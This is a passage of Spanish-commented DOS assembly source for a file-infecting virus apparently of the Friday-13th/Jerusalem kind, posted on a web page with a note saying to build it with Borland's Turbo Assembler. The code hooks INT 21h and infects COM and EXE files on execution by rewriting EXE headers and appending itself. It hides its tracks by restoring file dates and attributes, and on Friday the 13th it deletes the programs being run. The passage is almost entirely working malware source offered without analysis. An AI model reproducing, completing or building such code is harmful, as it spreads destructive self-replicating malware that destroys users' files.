    cmp ah,0DEh ; Interrupcion 21h
    je misterio
    cmp ax,4B00h ; Cuando se ejecuta un prog.
    jne retorna_21 ; infectalo...
    jmp infectar

    retorna_21: popf
    jmp cs:old_int21

    ejec_real_com:
    pop ax
    pop ax
    mov ax,0100h
    mov cs:ini_prog_off,ax
    pop ax
    mov cs:ini_prog_seg,ax
    rep movsb
    popf
    mov ax,cs:npi
    jmp cs:ini_prog

    misterio: add sp,6
    popf
    mov ax,cs
    mov ss,ax
    mov sp,fin_virus
    push es
    push es
    xor di,di
    push cs
    pop es
    mov cx,10h
    mov si,bx
    mov di,21h
    rep movsb
    mov ax,ds
    mov es,ax
    mul cs:bytes_parraf
    add ax,cs:no_usado3
    adc dx,0
    div cs:bytes_parraf
    mov ds,ax
    mov si,dx
    mov di,dx
    mov bp,es
    mov bx,cs:no_usado4
    or bx,bx
    jz fin_misterio

    bucle_mister: mov cx,8000h
    rep movsw
    add ax,1000h
    add bp,1000h
    mov ds,ax
    mov es,bp
    dec bx
    jnz bucle_mister

    fin_misterio: mov cx,cs:no_usado5
    rep movsb
    pop ax
    push ax
    add ax,10h
    add cs:no_usado6,ax
    add cs:no_usado7,ax
    mov ax,cs:no_usado8
    pop ds
    pop es
    mov ss,cs:no_usado6
    mov sp,cs:no_usado9
    jmp cs:no_usado_nada

    a_borrar: xor cx,cx
    mov ax,4301h
    int 21h
    mov ah,41h
    int 21h
    mov ax,4B00h
    popf
    jmp cs:old_int21

    infectar: cmp cs:viernes_13,1 ; Compara si hoy es viernes 13
    je a_borrar ; si es asi, inicia el efecto...
    mov cs:handle,0FFFFh
    mov cs:temporal,0
    mov cs:nom_prog_off,dx
    mov cs:nom_prog_seg,ds
    push ax
    push bx
    push cx
    push dx
    push si
    push di
    push ds
    push es
    cld
    mov di,dx
    xor dl,dl
    cmp byte ptr [di+1],':'
    jne no_unidad
    mov dl,[di]
    and dl,1Fh
    no_unidad: mov ah,36h
    int 21h
    cmp ax,0FFFFh
    jne disco_bien
    no_espacio: jmp volver_sys
    disco_bien: mul bx
    mul cx
    or dx,dx
    jnz hay_espacio
    cmp ax,fin_virus
    jb no_espacio
    hay_espacio: mov dx,cs:nom_prog_off
    push ds
    pop es
    xor al,al
    mov cx,41h
    repne scasb
    mov si,cs:nom_prog_off
    bucle_caps: mov al,[si]
    or al,al
    jz todo_caps
    cmp al,'a'
    jb no_letra
    cmp al,'z'
    ja no_letra
    sub byte ptr [si],20h
    no_letra: inc si
    jmp bucle_caps
    todo_caps: mov cx,0Bh
    sub si,cx
    mov di,offset command ; Busca que el fichero COM
    push cs ; a infectar no sea el
    pop es ; Command.com
    mov cx,0Bh
    repe cmpsb
    jnz no_command
    jmp volver_sys
    no_command: mov ax,4300h
    int 21h
    jc mira_si_com
    mov cs:atrib_fich,cx
    mira_si_com: jc lee_5_bytes
    xor al,al
    mov cs:com_o_exe,al
    push ds
    pop es
    mov di,dx
    mov cx,41h
    repne scasb
    cmp byte ptr [di-2],'M' ; Comprueba que el fichero
    je es_com ; EXE tenga la firma MZ.
    cmp byte ptr [di-2],'m'
    je es_com
    inc cs:com_o_exe
    es_com: mov ax,3D00h
    int 21h

    lee_5_bytes: jc cierra_fich
    mov cs:handle,ax
    mov bx,ax
    mov ax,4202h
    mov cx,0FFFFh ; Mueve el puntero al final
    mov dx,0FFFBh ; del fichero -5 para ver
    int 21h ; si tiene la cadena
    jc lee_5_bytes
    add ax,5
    mov cs:longitud_prog,ax
    mov cx,5
    mov dx,offset buff_cadena
    mov ax,cs
    mov ds,ax
    mov es,ax
    mov ah,3Fh
    int 21h
    mov di,dx ; Activando estas lineas en el
    mov si,offset identidad ; listado se consigue que el
    repe cmpsb ; virus solo infecte los EXE
    jnz no_infectado ; una vez.
    mov ah,3Eh
    int 21h
    jmp volver_sys

    no_infectado: mov ax,3524h
    int 21h
    mov ds:old_int24_off,bx ; Guarda la antigua int 24h
    mov ds:old_int24_seg,es
    mov dx,offset new_int24 ; Desvia la interrupcion 24h
    mov ax,2524h
    int 21h
    lds dx,ds:nom_prog
    xor cx,cx
    mov ax,4301h
    int 21h

    cierra_fich: jc exe_o_com
    mov bx,cs:handle
    mov ah,3Eh
    int 21h
    mov cs:handle,0FFFFh
    mov ax,3D02h
    int 21h
    jc exe_o_com
    mov cs:handle,ax
    mov ax,cs
    mov ds,ax
    mov es,ax
    mov bx,ds:handle
    mov ax,5700h
    int 21h
    mov ds:fecha,dx
    mov ds:hora,cx
    mov ax,4200h
    xor cx,cx
    mov dx,cx
    int 21h
    exe_o_com: jc mover_puntero
    cmp ds:com_o_exe,0
    je fichero_com
    jmp short fichero_exe
    nop
    fichero_com: mov bx,1000h
    mov ah,48h
    int 21h
    jnc memoria_ok
    mov ah,3Eh
    mov bx,ds:handle
    int 21h
    jmp volver_sys
    memoria_ok: inc ds:temporal
    mov es,ax
    xor si,si
    mov di,si
    mov cx,fin_virus
    rep movsb
    mov dx,di
    mov cx,ds:longitud_prog
    mov bx,ds:handle
    push es
    pop ds
    mov ah,3Fh
    int 21h
    mover_puntero:
    jc com_infectado
    add di,cx
    xor cx,cx
    mov dx,cx
    mov ax,4200h
    int 21h
    mov si,offset identidad
    mov cx,5
    rep movs byte ptr es:[di],cs:[si]
    mov cx,di
    xor dx,dx
    mov ah,40h
    int 21h
    com_infectado:
    jc modi_cabecera
    jmp prog_infectado

    fichero_exe: mov cx,1Ch
    mov dx,offset cabecera_exe
    mov ah,3Fh
    int 21h
    modi_cabecera:
    jc calcula
    mov ds:chksum,1984h ; Todos los calculos que vienen
    mov ax,ds:off_pila ; son para calcular la nueva
    mov ds:ss_original,ax ; cabecera EXE del programa.
    mov ax,ds:sp_inic
    mov ds:sp_original,ax
    mov ax,ds:ip_inic
    mov ds:ip_original,ax
    mov ax,ds:off_cs
    mov ds:cs_original,ax
    mov ax,ds:mod_512
    cmp ds:resto_512,0
    je es_entero
    dec ax
    es_entero: mul ds:bytes_512
    add ax,ds:resto_512
    adc dx,0
    add ax,0Fh
    adc dx,0
    and ax,0FFF0h
    mov ds:espacio_disk1,ax
    mov ds:espacio_disk2,dx
    add ax,fin_virus+5
    adc dx,0
    calcula: jc escribe_cabec
    div ds:bytes_512
    or dx,dx
    jz sigue_cabec
    inc ax
    sigue_cabec: mov ds:mod_512,ax
    mov ds:resto_512,dx
    mov ax,ds:espacio_disk1
    mov dx,ds:espacio_disk2
    div ds:bytes_parraf
    sub ax,ds:tam_cabec
    mov ds:off_cs,ax
    mov ds:ip_inic,offset inicio_exe
    mov ds:off_pila,ax
    mov ds:sp_inic,fin_virus
    xor cx,cx ; Mueve el puntero al principio
    mov dx,cx ; del fichero EXE
    mov ax,4200h ;
    int 21h
    escribe_cabec:
    jc mueve_puntero
    mov cx,1Ch ; Escribe la nueva cabecera del
    mov dx,offset cabecera_exe ; fichero EXE
    mov ah,40h
    int 21h
    mueve_puntero:
    jc escribe_virus
    cmp ax,cx
    jne prog_infectado ; Mueve el puntero al final
    mov dx,ds:espacio_disk1 ; del fichero a infectar
    mov cx,ds:espacio_disk2
    mov ax,4200h
    int 21h
    escribe_virus:
    jc prog_infectado
    mov di,fin_virus
    mov si,offset identidad
    mov cx,5
    push es
    push ds
    pop es
    rep movs byte ptr es:[di],cs:[si] ; Copia la cadena del virus
    pop es
    xor dx,dx
    mov cx,fin_virus+5 ; Escribe el c¢digo del virus
    mov ah,40h ; al final del fichero EXE
    int 21h

    prog_infectado:
    cmp cs:temporal,0
    je era_exe
    mov ah,49h
    int 21h

    era_exe: cmp cs:handle,0FFFFh
    je volver_sys
    mov bx,cs:handle
    mov dx,cs:fecha
    mov cx,cs:hora
    mov ax,5701h
    int 21h
    mov ah,3Eh
    int 21h
    lds dx,cs:nom_prog
    mov cx,cs:atrib_fich
    mov ax,4301h
    int 21h
    lds dx,cs:old_int24
    mov ax,2524h
    int 21h

    volver_sys: pop es
    pop ds
    pop di
    pop si
    pop dx
    pop cx
    pop bx
    pop ax
    popf
    jmp cs:old_int21

    pila db 11Bh dup (0) ; Pila del virus
    fin_programa db 'MsDos' ; Cadena que usa el virus para saber
    ; cuando un programa esta infectado

    codigo ends
    end inicio_exe


    El codigo esta en lenguaje assembler (ensamblador) y tiene que ser ensamblado en Turbo Assembler y Turbo Link de Borland.
    Usamos cookies propias y de terceros que entre otras cosas recogen datos sobre sus hábitos de navegación para mostrarle publicidad personalizada y realizar análisis de uso de nuestro sitio.
    Si continúa navegando consideramos que acepta su uso. OK Más información | Y más